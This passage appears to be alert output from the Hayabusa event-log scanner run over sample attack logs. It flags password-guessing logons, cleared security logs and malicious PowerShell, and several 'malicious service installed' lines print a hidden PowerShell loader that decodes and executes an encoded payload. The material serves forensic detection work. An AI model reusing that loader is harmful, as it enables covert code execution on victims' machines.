+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 
12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: 
IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx +2017-06-13 08:39:43.512 
+09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell 
Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in 